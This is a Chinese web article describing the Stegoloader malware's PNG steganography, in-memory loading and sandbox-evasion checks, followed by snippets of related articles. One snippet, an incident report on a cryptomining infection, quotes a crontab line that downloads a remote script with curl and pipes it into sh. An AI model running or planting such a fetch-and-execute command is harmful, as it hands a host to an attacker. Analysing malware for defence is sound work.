隐藏在图片下的恶意程序Stegoloader,是否避开了你的杀软?

Stegoloader也叫Win32/Gatak.DR 及TSPY_GATAK.GTK,它是一款首次于2013年被发现的恶意程序,但当时并未引起人们的注意,主要是以为它的设计很隐秘,因此很多反病毒解决方案并不能检测得到。信息隐藏技术是用来在另一信息或者图像文件中隐藏信息的一种技术。恶意程序作者利用它在图像文件中隐藏执行代码,在一系列的安全检测实施完之后,他才会被提取出来并运行。这种隐藏技术还被其他的一些恶意程序家族利用,如Miniduke APT组织、Aulreon木马、Lurk下载器。

在Stegoloader感染过程中,临时部署组件会从互联网上下载一个功能性的PNG文件。在PNG文件的像素内部,隐藏着少量可以提取出来用于重建木马主模块的加密代码。PNG图像和木马主模块都不会保存在磁盘上,整个过程只是在计算机的内存中进行,木马也是直接加载到内存中。

躲避方法1:

在部署其他的模块之前,该恶意程序会检查它不是处在(杀毒软件的)调试环境中。例如,部署一个模块监视鼠标光标的移动情况,如果鼠标不停的变换位置或者永远不变换位置,就说明当前环境有“猫腻”,恶意程序会立即终止所有恶意行为。

躲避方法2:

部署模块会列出系统当前运行的进程,一旦发现某些安全工具的硬编码字符,如Wireshark、Fiddler,它就不会在该系统上运行。如果没有发现任何的安全威胁,它才会与C&C服务器连接,加密通信,下载含有恶意程序的PNG文件。

无论是PNG图片还是解密后的代码均不会存储在磁盘上,这样的话传统基于磁盘的分析工具就很难发现该恶意程序。

一经下载,病毒会伪装成有关Skype或Google Talk的正规文件,下载含有恶意程序的照片文件。

Stegoloader会使用多种规避手段避免被执法部门和安全厂商调查,比如它会检查它不是处在杀毒软件的调试环境中。

时间: 2024-12-22 18:27:44

隐藏在图片下的恶意程序Stegoloader,是否避开了你的杀软?的相关文章

被黑客种下恶意程序进行挖矿的排除案例

被黑客种下恶意程序进行挖矿的排除案例   在查询一个redis一个rbd文件没有在指定文件目录下进行保存时发现crontab上有个定时脚本,才发现被攻击放马了 #crontab -l */10 ** * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh minerd是什么 minerd是挖矿程序,黑客入侵后,会利用宿主cpu进行复杂计算,强占cpu资源,使cpu使用率高达100% 下载脚本: cat  pm.sh exportPATH=$

Eclipse下导出java程序可执行的jar包图片无法显示问题的一种解决方法

说明:在eclipse中运行java程序的时候一切正常,可是当把jar包导出的时候却发现图片没法显示,这估计是java程序的各种配置和路径问题所导致,后来找到一种解决方法,供遇到这方面问题的学习java程序的鞋同参考: Java项目下的目录结构如下: 其中class类放在包:package accpedu; (即实际是在如上bin/accpedu文件夹下面) 通过下面的方法来引用图片时,在eclipse里面执行是可以正常显示图片的: ImageIcon image1 = new ImageIco

病毒木马查杀实战第026篇:“白加黑”恶意程序研究(上)

前言 众所周知,传统的恶意程序都是由单一文件构成的,从而实现某一种或者几种恶意功能.而这类的恶意程序为了避免被发现以及被查杀,往往会采用五花八门的自我隐藏技术以及免杀技术,病毒程序的作者很多时候也是脑洞大开,为了对抗杀软的查杀也是无所不用其极.我们每天所处理的恶意文件里面,反查杀手段运用得最好的就是脚本木马,关于这类程序,我在之前的<病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御>这篇博文中也做过简单的论述.可是,不论恶意程序如何进化,杀软厂商总有各种各样的方法来应对现有的以及未知

恶意程序新趋势-钻粪坑+数签

最近看到一些有趣的样本.跟大家聊聊其中一个名为"XX下载防踢补丁"的恶意程序.它使用了一些特殊却极为有效策略.使自己可以长期逃脱杀软的检查.其中暴露出来的问题或许更值得我们每一个安全界人士的思考. 感染流程及其行为如下: 首先其以XX下载功能插件的名义使用户开心去下载并替换XX下载原dll. 用户放置后发现果然有效果.(真干活,达到用户期望) 加了数字签名. 效果是: 用户是有意识要这样做的.并且完成了用户要完成的功能. 依赖于下载工具.不通过启动项启动.降低了杀软被查阅的可能性 而且

怎样把文件隐藏在图片文件里

源地址:http://www.pixelstech.net/article/1347582974-Hide-a-file-in-a-picture 这里仅说一下方法,源地址如上 预先准备: 1.一张图片,比如beian.png 2.一个文件,比如beian.txt 步骤: 1.先准备上面两个文件,放在同一目录下 2.使用WINARA或者好压 压缩beian.txt到beian.rar 或 beian.zip 3.打开windows命令提示符,并切换到到前面的两个文件目录下 4.输入: copy

现代恶意程序运作浅探及思考

有不少人为"黑客"一词辩护,认为其所指乃是一群"技术狂人"而已,"黑客"分享工具,而脚本小子使用工具干坏事.随着越来越多恶意程序从技术展示转变为明确的Stealing.这让我感觉"黑客"群体并不比世俗社会更纯洁.当越来越多具有较低受教育水平的人加入其中.目的或许只剩下如何快速地赚钱. 速成时代 前段时间一个木马制作者被曝光了出来.他在三年前还在计算机论坛问一些很基础的计算机问题.而今他已经是一名拥有几十万肉鸡的"红人

Ubuntu下删除卸载程序图标

Ubuntu下删除卸载程序图标 方法一:直接在终端输入命令alacarte.可以任意增.改.隐藏.显示菜单,但无法删除菜单,即使拥有root权限. 方法二:注意几个目录和文件./usr/share/applications/下的desktop文件/usr/share/applications/mimeinfo.cache文件~/.local/share/applications下的desktop文件~/.local/share/applications/default.list目录下的文件~/.

隐藏的图片在浏览器中的请求

图片在页面中一般会以两种形式出现:img元素或者背景图片. 那么在img或者使用背景图片的元素被隐藏之后,页面加载的时候浏览器会不会发送http请求加载图片呢? 注:隐藏分为两种情况(display:none)和(visibility:hidden) 接下来就对两种情况下不同浏览器的请求情况坐下对比 ①.display:none的情况 ②.visibility: hidden的情况 隐藏的图片在浏览器中的请求

Rootkit Hunter恶意程序查杀

恶意程序,恶意代码检测,主要用来检测常规后门程序 下载:https://pkgs.org/search/rkhunter 安装:rpm -ivh rkunter* Installed: #需要先安装  lsof.x86_64 0:4.82-4.el6             mailx.x86_64 0:12.4-7.el6 检测系统: rkhunter -h  #查看参数 -c   #检测系统 --sk #跳过键盘输入 exp: rkhunter -c --sk [[email protect